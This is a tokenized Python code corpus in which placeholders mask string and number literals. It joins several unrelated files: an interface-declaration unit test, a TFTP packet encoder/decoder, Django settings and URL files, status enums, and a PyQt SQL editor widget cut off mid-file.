get_full_name <EOL> ) <EOL> def test_check_compliance_inheritance ( self ) : <EOL> class IEntity ( Interface ) : <EOL> id = """<STR_LIT>""" <EOL> class ICommon ( Interface ) : <EOL> added = """<STR_LIT>""" <EOL> class IPerson ( IEntity , ICommon ) : <EOL> name = """<STR_LIT>""" <EOL> class IManager ( IPerson ) : <EOL> annoying = """<STR_LIT>""" <EOL> self . assertTupleEqual ( <EOL> IEntity . implied , <EOL> ( IEntity , ) <EOL> ) <EOL> self . assertTupleEqual ( <EOL> ICommon . implied , <EOL> ( ICommon , ) <EOL> ) <EOL> self . assertTupleEqual ( <EOL> IPerson . implied , <EOL> ( IPerson , IEntity , ICommon , ) <EOL> ) <EOL> self . assertTupleEqual ( <EOL> IManager . implied , <EOL> ( IManager , IPerson , IEntity , ICommon , ) <EOL> ) <EOL> self . assertAttributes ( <EOL> IEntity , <EOL> [ '<STR_LIT:id>' ] <EOL> ) <EOL> self . assertAttributes ( <EOL> ICommon , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IPerson , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:name>' , <EOL> ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IManager , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> class InvalidManager1 ( object ) : <EOL> def __init__ ( self ) : <EOL> self . annoying = True <EOL> with self . assertRaises ( MissingAttributeError ) as cm : <EOL> IManager . check_compliance ( InvalidManager1 ( ) ) <EOL> class InvalidManager2 ( object ) : <EOL> def __init__ ( self ) : <EOL> self . name = "<STR_LIT>" <EOL> self . added = None <EOL> self . annoying = True <EOL> with self . assertRaises ( MissingAttributeError ) as cm : <EOL> IManager . check_compliance ( InvalidManager2 ( ) ) <EOL> self . assertEqual ( cm . exception . attribute_name , '<STR_LIT:id>' ) <EOL> class ValidManager ( object ) : <EOL> def __init__ ( self ) : <EOL> self . id = <NUM_LIT:1> <EOL> self . added = None <EOL> self . annoying = True <EOL> self . name = "<STR_LIT>" <EOL> IManager . 
check_compliance ( ValidManager ( ) ) <EOL> def test_docstring ( self ) : <EOL> class IObject ( Interface ) : <EOL> """<STR_LIT>""" <EOL> self . assertAttributes ( <EOL> IObject , <EOL> [ ] <EOL> ) <EOL> self . assertEqual ( IObject . __doc__ , "<STR_LIT>" ) <EOL> class DeclarationTest ( unittest . TestCase ) : <EOL> def assertIsImplementation ( self , obj , interfaces ) : <EOL> self . assertTrue ( isimplementation ( obj , interfaces ) ) <EOL> def assertNotIsImplementation ( self , obj , interfaces ) : <EOL> self . assertFalse ( isimplementation ( obj , interfaces ) ) <EOL> def test_implements ( self ) : <EOL> class ICreature ( Interface ) : <EOL> age = """<STR_LIT>""" <EOL> class IPerson ( ICreature ) : <EOL> first_name = Attribute ( """<STR_LIT>""" ) <EOL> last_name = Attribute ( """<STR_LIT>""" ) <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> class IObject ( Interface ) : <EOL> id = """<STR_LIT>""" <EOL> class IDuck ( Interface ) : <EOL> def quack ( ) : <EOL> pass <EOL> class IEmployee ( Interface ) : <EOL> salary = """<STR_LIT>""" <EOL> @ implements ( IPerson , IObject ) <EOL> class Person ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . id = <NUM_LIT:1> <EOL> self . first_name = '<STR_LIT>' <EOL> self . last_name = '<STR_LIT>' <EOL> def get_full_name ( self ) : <EOL> return '<STR_LIT>' . format ( self . first_name , self . last_name ) <EOL> @ implements ( IEmployee ) <EOL> class Employee ( Person ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( Person . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( inspect . getdoc ( Person ) , "<STR_LIT>" ) <EOL> self . assertEqual ( Employee . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( inspect . getdoc ( Employee ) , "<STR_LIT>" ) <EOL> for cls in ( Person , Employee , ) : <EOL> self . assertIsImplementation ( cls , [ ] ) <EOL> self . assertIsImplementation ( cls , ICreature ) <EOL> self . assertIsImplementation ( cls , IPerson ) <EOL> self . 
assertIsImplementation ( cls , IObject ) <EOL> self . assertIsImplementation ( cls , [ IPerson ] ) <EOL> self . assertIsImplementation ( cls , [ IObject ] ) <EOL> self . assertIsImplementation ( cls , [ IObject , IPerson ] ) <EOL> self . assertIsImplementation ( cls , [ ICreature , IObject , IPerson ] ) <EOL> self . assertNotIsImplementation ( cls , IDuck ) <EOL> self . assertNotIsImplementation ( cls , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( cls , [ IDuck , IObject ] ) <EOL> self . assertNotIsImplementation ( cls , [ IObject , IPerson , IDuck ] ) <EOL> self . assertIsImplementation ( Employee , IEmployee ) <EOL> self . assertNotIsImplementation ( Person , IEmployee ) <EOL> for obj in ( Person ( ) , Employee ( ) , ) : <EOL> self . assertIsImplementation ( obj , [ ] ) <EOL> self . assertIsImplementation ( obj , ICreature ) <EOL> self . assertIsImplementation ( obj , IPerson ) <EOL> self . assertIsImplementation ( obj , IObject ) <EOL> self . assertIsImplementation ( obj , [ IPerson ] ) <EOL> self . assertIsImplementation ( obj , [ IObject ] ) <EOL> self . assertIsImplementation ( obj , [ IObject , IPerson ] ) <EOL> self . assertIsImplementation ( obj , [ ICreature , IObject , IPerson ] ) <EOL> self . assertNotIsImplementation ( obj , IDuck ) <EOL> self . assertNotIsImplementation ( obj , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( obj , [ IDuck , IObject ] ) <EOL> self . assertNotIsImplementation ( obj , [ IObject , IPerson , IDuck ] ) <EOL> self . assertIsImplementation ( Employee ( ) , IEmployee ) <EOL> self . 
assertNotIsImplementation ( Person ( ) , IEmployee ) <EOL> def test_implements_only ( self ) : <EOL> class ICreature ( Interface ) : <EOL> age = """<STR_LIT>""" <EOL> class IPerson ( ICreature ) : <EOL> first_name = Attribute ( """<STR_LIT>""" ) <EOL> last_name = Attribute ( """<STR_LIT>""" ) <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> class IObject ( Interface ) : <EOL> id = """<STR_LIT>""" <EOL> class IDuck ( Interface ) : <EOL> def quack ( ) : <EOL> pass <EOL> @ implements ( IPerson , IObject ) <EOL> class Person ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . id = <NUM_LIT:1> <EOL> self . first_name = '<STR_LIT>' <EOL> self . last_name = '<STR_LIT>' <EOL> def get_full_name ( self ) : <EOL> return '<STR_LIT>' . format ( self . first_name , self . last_name ) <EOL> @ implements_only ( IDuck ) <EOL> class Duck ( Person ) : <EOL> """<STR_LIT>""" <EOL> def quack ( self ) : <EOL> pass <EOL> self . assertSetEqual ( <EOL> get_implemented_interfaces ( Duck ) , <EOL> set ( [ IDuck ] ) <EOL> ) <EOL> self . assertSetEqual ( <EOL> get_implemented_interfaces ( Person ) , <EOL> set ( [ ICreature , IPerson , IObject ] ) <EOL> ) <EOL> self . assertEqual ( Duck . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( inspect . getdoc ( Duck ) , "<STR_LIT>" ) <EOL> self . assertIsImplementation ( Duck , [ ] ) <EOL> self . assertIsImplementation ( Duck , IDuck ) <EOL> self . assertIsImplementation ( Duck , [ IDuck ] ) <EOL> self . assertNotIsImplementation ( Duck , IPerson ) <EOL> self . assertNotIsImplementation ( Duck , IObject ) <EOL> self . assertNotIsImplementation ( Duck , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( Duck , [ IDuck , IObject , IPerson ] ) <EOL> duck = Duck ( ) <EOL> self . assertIsImplementation ( duck , [ ] ) <EOL> self . assertIsImplementation ( duck , IDuck ) <EOL> self . assertIsImplementation ( duck , [ IDuck ] ) <EOL> self . assertNotIsImplementation ( duck , IPerson ) <EOL> self . 
assertNotIsImplementation ( duck , IObject ) <EOL> self . assertNotIsImplementation ( duck , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( duck , [ IDuck , IObject , IPerson ] ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> from . config import Config <EOL> from . trials import Trial <EOL> from sklearn . pipeline import Pipeline <EOL> def execute ( args , parser ) : <EOL> config = Config ( args . config , verbose = False ) <EOL> session = config . trials ( ) <EOL> items = [ curr . to_dict ( ) for curr in session . query ( Trial ) . all ( ) ] <EOL> if not items : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> c_b_m = items [ np . argmax ( [ i [ "<STR_LIT>" ] for i in items ] ) ] <EOL> parameter_dict = c_b_m [ "<STR_LIT>" ] <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' % ( c_b_m [ "<STR_LIT>" ] , <EOL> np . std ( c_b_m [ "<STR_LIT>" ] ) ) ) <EOL> print ( '<STR_LIT>' ) <EOL> if isinstance ( config . estimator ( ) , Pipeline ) : <EOL> print ( '<STR_LIT>' ) <EOL> for i in config . estimator ( ) . steps : <EOL> print ( i [ <NUM_LIT:0> ] ) <EOL> for param in sorted ( parameter_dict . keys ( ) ) : <EOL> if str ( param ) . startswith ( i [ <NUM_LIT:0> ] ) : <EOL> print ( "<STR_LIT>" , param . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] , "<STR_LIT:\t>" , <EOL> parameter_dict [ param ] ) <EOL> else : <EOL> print ( config . estimator ( ) ) <EOL> search_space = config . search_space ( ) . variables . keys ( ) <EOL> for param in sorted ( parameter_dict . keys ( ) ) : <EOL> if param in search_space : <EOL> print ( "<STR_LIT>" , param , "<STR_LIT:\t>" , parameter_dict [ param ] ) <EOL> return </s>
<s> class ExprStatus : <EOL> Init = <NUM_LIT:0> <EOL> Starting = <NUM_LIT:1> <EOL> Running = <NUM_LIT:2> <EOL> Stopped = <NUM_LIT:3> <EOL> Deleted = <NUM_LIT:4> <EOL> Failed = <NUM_LIT:5> <EOL> Rollbacking = <NUM_LIT:6> <EOL> Rollbacked = <NUM_LIT:7> <EOL> class VirtualEnvStatus : <EOL> Init = <NUM_LIT:0> <EOL> Running = <NUM_LIT:1> <EOL> Stopped = <NUM_LIT:2> <EOL> Deleted = <NUM_LIT:3> <EOL> class PortBindingType : <EOL> CloudService = <NUM_LIT:1> <EOL> Docker = <NUM_LIT:2> <EOL> class VirtualEnvironmentProvider : <EOL> AzureVM = "<STR_LIT>" <EOL> Docker = "<STR_LIT>" <EOL> class RemoteProvider : <EOL> Guacamole = "<STR_LIT>" <EOL> class EmailStatus : <EOL> Primary = <NUM_LIT:1> <EOL> NonPrimary = <NUM_LIT:0> <EOL> class LoginProvider : <EOL> live = <NUM_LIT:1> <EOL> github = <NUM_LIT:2> <EOL> qq = <NUM_LIT:4> <EOL> weibo = <NUM_LIT:8> <EOL> alauda = <NUM_LIT:32> <EOL> wechat = <NUM_LIT:64> </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from TftpShared import * <EOL> class TftpSession ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class TftpPacketWithOptions ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . options = { } <EOL> def setoptions ( self , options ) : <EOL> log . debug ( "<STR_LIT>" ) <EOL> log . debug ( "<STR_LIT>" , str ( options ) ) <EOL> myoptions = { } <EOL> for key in options : <EOL> newkey = str ( key ) <EOL> myoptions [ newkey ] = str ( options [ key ] ) <EOL> log . debug ( "<STR_LIT>" , <EOL> newkey , myoptions [ newkey ] ) <EOL> log . debug ( "<STR_LIT>" , str ( myoptions ) ) <EOL> self . _options = myoptions <EOL> def getoptions ( self ) : <EOL> log . debug ( "<STR_LIT>" ) <EOL> return self . _options <EOL> options = property ( getoptions , setoptions ) <EOL> def decode_options ( self , buffer ) : <EOL> """<STR_LIT>""" <EOL> format = "<STR_LIT:!>" <EOL> options = { } <EOL> log . debug ( "<STR_LIT>" , repr ( buffer ) ) <EOL> log . debug ( "<STR_LIT>" , len ( buffer ) ) <EOL> if len ( buffer ) == <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> return { } <EOL> log . debug ( "<STR_LIT>" ) <EOL> length = <NUM_LIT:0> <EOL> for c in buffer : <EOL> if ord ( c ) == <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" , length ) <EOL> if length > <NUM_LIT:0> : <EOL> format += "<STR_LIT>" % length <EOL> length = - <NUM_LIT:1> <EOL> else : <EOL> raise TftpException , "<STR_LIT>" <EOL> length += <NUM_LIT:1> <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> mystruct = struct . unpack ( format , buffer ) <EOL> tftpassert ( len ( mystruct ) % <NUM_LIT:2> == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> for i in range ( <NUM_LIT:0> , len ( mystruct ) , <NUM_LIT:2> ) : <EOL> log . 
debug ( "<STR_LIT>" , mystruct [ i ] , mystruct [ i + <NUM_LIT:1> ] ) <EOL> options [ mystruct [ i ] ] = mystruct [ i + <NUM_LIT:1> ] <EOL> return options <EOL> class TftpPacket ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . opcode = <NUM_LIT:0> <EOL> self . buffer = None <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError , "<STR_LIT>" <EOL> def decode ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError , "<STR_LIT>" <EOL> class TftpPacketInitial ( TftpPacket , TftpPacketWithOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> TftpPacketWithOptions . __init__ ( self ) <EOL> self . filename = None <EOL> self . mode = None <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> tftpassert ( self . filename , "<STR_LIT>" ) <EOL> tftpassert ( self . mode , "<STR_LIT>" ) <EOL> ptype = None <EOL> if self . opcode == <NUM_LIT:1> : ptype = "<STR_LIT>" <EOL> else : ptype = "<STR_LIT>" <EOL> log . debug ( "<STR_LIT>" , <EOL> ptype , self . filename , self . mode ) <EOL> for key in self . options : <EOL> log . debug ( "<STR_LIT>" , key , self . options [ key ] ) <EOL> format = "<STR_LIT>" <EOL> format += "<STR_LIT>" % len ( self . filename ) <EOL> if self . mode == "<STR_LIT>" : <EOL> format += "<STR_LIT>" <EOL> else : <EOL> raise AssertionError , "<STR_LIT>" % mode <EOL> options_list = [ ] <EOL> if self . options . keys ( ) > <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> for key in self . options : <EOL> format += "<STR_LIT>" % len ( key ) <EOL> options_list . append ( key ) <EOL> format += "<STR_LIT>" % len ( str ( self . options [ key ] ) ) <EOL> options_list . append ( str ( self . options [ key ] ) ) <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> log . debug ( "<STR_LIT>" , options_list ) <EOL> log . debug ( "<STR_LIT>" , struct . calcsize ( format ) ) <EOL> self . buffer = struct . pack ( format , <EOL> self . opcode , <EOL> self . 
filename , <EOL> self . mode , <EOL> * options_list ) <EOL> log . debug ( "<STR_LIT>" , repr ( self . buffer ) ) <EOL> return self <EOL> def decode ( self ) : <EOL> tftpassert ( self . buffer , "<STR_LIT>" ) <EOL> nulls = <NUM_LIT:0> <EOL> format = "<STR_LIT>" <EOL> nulls = length = tlength = <NUM_LIT:0> <EOL> log . debug ( "<STR_LIT>" ) <EOL> subbuf = self . buffer [ <NUM_LIT:2> : ] <EOL> for c in subbuf : <EOL> if ord ( c ) == <NUM_LIT:0> : <EOL> nulls += <NUM_LIT:1> <EOL> log . debug ( "<STR_LIT>" , length , nulls ) <EOL> format += "<STR_LIT>" % length <EOL> length = - <NUM_LIT:1> <EOL> if nulls == <NUM_LIT:2> : <EOL> break <EOL> length += <NUM_LIT:1> <EOL> tlength += <NUM_LIT:1> <EOL> log . debug ( "<STR_LIT>" , tlength ) <EOL> tftpassert ( nulls == <NUM_LIT:2> , "<STR_LIT>" ) <EOL> shortbuf = subbuf [ : tlength + <NUM_LIT:1> ] <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> log . debug ( "<STR_LIT>" , repr ( shortbuf ) ) <EOL> mystruct = struct . unpack ( format , shortbuf ) <EOL> tftpassert ( len ( mystruct ) == <NUM_LIT:2> , "<STR_LIT>" ) <EOL> self . filename = mystruct [ <NUM_LIT:0> ] <EOL> self . mode = mystruct [ <NUM_LIT:1> ] . lower ( ) <EOL> log . debug ( "<STR_LIT>" , self . filename ) <EOL> log . debug ( "<STR_LIT>" , self . mode ) <EOL> self . options = self . decode_options ( subbuf [ tlength + <NUM_LIT:1> : ] ) <EOL> return self <EOL> class TftpPacketRRQ ( TftpPacketInitial ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacketInitial . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:1> <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . filename <EOL> s += '<STR_LIT>' % self . mode <EOL> if self . options : <EOL> s += '<STR_LIT>' % self . options <EOL> return s <EOL> class TftpPacketWRQ ( TftpPacketInitial ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacketInitial . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:2> <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . 
filename <EOL> s += '<STR_LIT>' % self . mode <EOL> if self . options : <EOL> s += '<STR_LIT>' % self . options <EOL> return s <EOL> class TftpPacketDAT ( TftpPacket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:3> <EOL> self . blocknumber = <NUM_LIT:0> <EOL> self . data = None <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . blocknumber <EOL> if self . data : <EOL> s += '<STR_LIT>' % len ( self . data ) <EOL> return s <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . data ) == <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> format = "<STR_LIT>" % len ( self . data ) <EOL> self . buffer = struct . pack ( format , <EOL> self . opcode , <EOL> self . blocknumber , <EOL> self . data ) <EOL> return self <EOL> def decode ( self ) : <EOL> """<STR_LIT>""" <EOL> ( self . blocknumber , ) = struct . unpack ( "<STR_LIT>" , self . buffer [ <NUM_LIT:2> : <NUM_LIT:4> ] ) <EOL> log . debug ( "<STR_LIT>" , self . blocknumber ) <EOL> log . debug ( "<STR_LIT>" , len ( self . buffer ) ) <EOL> self . data = self . buffer [ <NUM_LIT:4> : ] <EOL> log . debug ( "<STR_LIT>" , len ( self . data ) ) <EOL> return self <EOL> class TftpPacketACK ( TftpPacket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:4> <EOL> self . blocknumber = <NUM_LIT:0> <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . blocknumber <EOL> def encode ( self ) : <EOL> log . debug ( "<STR_LIT>" , <EOL> self . opcode , self . blocknumber ) <EOL> self . buffer = struct . pack ( "<STR_LIT>" , self . opcode , self . blocknumber ) <EOL> return self <EOL> def decode ( self ) : <EOL> if len ( self . buffer ) > <NUM_LIT:4> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> log . debug ( "<STR_LIT>" , repr ( self . buffer ) ) <EOL> self . buffer = self . buffer [ <NUM_LIT:0> : <NUM_LIT:4> ] <EOL> self . opcode , self . 
blocknumber = struct . unpack ( "<STR_LIT>" , self . buffer ) <EOL> log . debug ( "<STR_LIT>" , <EOL> self . opcode , self . blocknumber ) <EOL> return self <EOL> class TftpPacketERR ( TftpPacket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:5> <EOL> self . errorcode = <NUM_LIT:0> <EOL> self . errmsg = None <EOL> self . errmsgs = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" <EOL> } <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . errorcode <EOL> s += '<STR_LIT>' % self . errmsgs . get ( self . errorcode , '<STR_LIT>' ) <EOL> return s <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> format = "<STR_LIT>" % len ( self . errmsgs [ self . errorcode ] ) <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> self . buffer = struct . pack ( format , <EOL> self . opcode , <EOL> self . errorcode , <EOL> self . errmsgs [ self . errorcode ] ) <EOL> return self <EOL> def decode ( self ) : <EOL> "<STR_LIT>" <EOL> buflen = len ( self . buffer ) <EOL> tftpassert ( buflen >= <NUM_LIT:4> , "<STR_LIT>" ) <EOL> log . debug ( "<STR_LIT>" , buflen ) <EOL> if buflen == <NUM_LIT:4> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> format = "<STR_LIT>" <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> self . opcode , self . errorcode = struct . unpack ( format , <EOL> self . buffer ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" ) <EOL> format = "<STR_LIT>" % ( len ( self . buffer ) - <NUM_LIT:5> ) <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> self . opcode , self . errorcode , self . errmsg = struct . unpack ( format , <EOL> self . buffer ) <EOL> log . error ( "<STR_LIT>" <EOL> % ( self . errorcode , self . 
errmsg ) ) <EOL> return self <EOL> class TftpPacketOACK ( TftpPacket , TftpPacketWithOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> TftpPacketWithOptions . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:6> <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . options <EOL> def encode ( self ) : <EOL> format = "<STR_LIT>" <EOL> options_list = [ ] <EOL> log . debug ( "<STR_LIT>" ) <EOL> for key in self . options : <EOL> log . debug ( "<STR_LIT>" , key ) <EOL> log . debug ( "<STR_LIT>" , self . options [ key ] ) <EOL> format += "<STR_LIT>" % len ( key ) <EOL> format += "<STR_LIT>" % len ( self . options [ key ] ) <EOL> options_list . append ( key ) <EOL> options_list . append ( self . options [ key ] ) <EOL> self . buffer = struct . pack ( format , self . opcode , * options_list ) <EOL> return self <EOL> def decode ( self ) : <EOL> self . options = self . decode_options ( self . buffer [ <NUM_LIT:2> : ] ) <EOL> return self <EOL> def match_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> for name in self . options : <EOL> if options . has_key ( name ) : <EOL> if name == '<STR_LIT>' : <EOL> size = int ( self . options [ name ] ) <EOL> if size >= MIN_BLKSIZE and size <= MAX_BLKSIZE : <EOL> log . debug ( "<STR_LIT>" , size ) <EOL> else : <EOL> raise TftpException , "<STR_LIT>" % size <EOL> elif name == '<STR_LIT>' : <EOL> size = int ( self . options [ name ] ) <EOL> if size < <NUM_LIT:0> : <EOL> raise TftpException , "<STR_LIT>" <EOL> else : <EOL> raise TftpException , "<STR_LIT>" % name <EOL> return True </s>
<s> import os <EOL> DIRNAME = os . path . dirname ( __file__ ) <EOL> DEBUG = True <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> SITE_ID = <NUM_LIT:1> <EOL> MEDIA_ROOT = DIRNAME + "<STR_LIT>" <EOL> MEDIA_URL = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( DIRNAME , "<STR_LIT>" ) , <EOL> ) <EOL> INSTALLED_APPS = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ] <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> SECRET_KEY = "<STR_LIT>" <EOL> POSTAL_ADDRESS_L10N = True </s>
<s> from django . conf . urls import * <EOL> urlpatterns = patterns ( "<STR_LIT>" , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> from PyQt4 import QtGui <EOL> from PyQt4 import Qsci <EOL> from zipfile import ZipFile <EOL> from gzip import GzipFile <EOL> from bz2 import BZ2File <EOL> import codecs <EOL> class SQLEditor ( Qsci . QsciScintilla ) : <EOL> font = QtGui . QFont ( "<STR_LIT>" ) <EOL> def __init__ ( self , parent ) : <EOL> Qsci . QsciScintilla . __init__ ( self , parent ) <EOL> self . lexer = Qsci . QsciLexerSQL ( ) <EOL> self . lexer . setDefaultFont ( self . font ) <EOL> self . lexer . setFont ( self . font ) <EOL> self . setMarginsFont ( self . font ) <EOL> fgColor = QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) <EOL> bgColor = QtGui . QColor ( <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) <EOL> black = QtGui . QColor ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> comment = QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) <EOL> self . lexer . setDefaultColor ( fgColor ) <EOL> self . lexer . setColor ( fgColor , self . lexer . Default ) <EOL> self . lexer . setColor ( comment , self . lexer . Comment ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentLine ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentDoc ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . Number ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . Keyword ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . DoubleQuotedString ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . SingleQuotedString ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . PlusKeyword ) <EOL> self . lexer . setColor ( fgColor , self . lexer . Operator ) <EOL> self . lexer . setColor ( fgColor , self . 
lexer . Identifier ) <EOL> self . lexer . setColor ( comment , self . lexer . PlusComment ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentLineHash ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentDocKeyword ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentDocKeywordError ) <EOL> self . lexer . setPaper ( bgColor ) <EOL> self . lexer . setDefaultPaper ( bgColor ) <EOL> self . setCaretForegroundColor ( fgColor ) <EOL> self . setSelectionBackgroundColor ( black ) <EOL> self . setCaretLineVisible ( True ) <EOL> self . setCaretLineBackgroundColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) ) <EOL> self . setMarginsForegroundColor ( bgColor ) <EOL> self . setMarginsBackgroundColor ( black ) <EOL> self . setMatchedBraceForegroundColor ( fgColor ) <EOL> self . setMatchedBraceBackgroundColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) ) <EOL> self . setAutoIndent ( True ) <EOL> self . setFolding ( Qsci . QsciScintilla . NoFoldStyle ) <EOL> self . setWrapMode ( Qsci . QsciScintilla . WrapWord ) <EOL> self . setMarginWidth ( <NUM_LIT:0> , <NUM_LIT:30> ) <EOL> self . setMarginLineNumbers ( <NUM_LIT:0> , True ) <EOL> self . setBraceMatching ( self . SloppyBraceMatch ) <EOL> self . setLexer ( self . lexer ) <EOL> self . setUtf8 ( True ) <EOL> self . filename = None <EOL> def loadDialog ( self ) : <EOL> filename = QtGui . QFileDialog . getOpenFileName ( self , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if filename : <EOL> self . filename = filename <EOL> if self . filename . endswith ( "<STR_LIT>" ) : <EOL> opener = GzipFile <EOL> elif self . filename . endswith ( "<STR_LIT>" ) : <EOL> opener = BZ2File <EOL> elif self . filename . endswith ( "<STR_LIT>" ) : <EOL> opener = ZipFile <EOL> else : <EOL> opener = open <EOL> with codecs . EncodedFile ( opener ( self . filename , "<STR_LIT:r>" ) , "<STR_LIT:utf-8>" ) as f : <EOL> sql = f . read ( ) <EOL> self . 
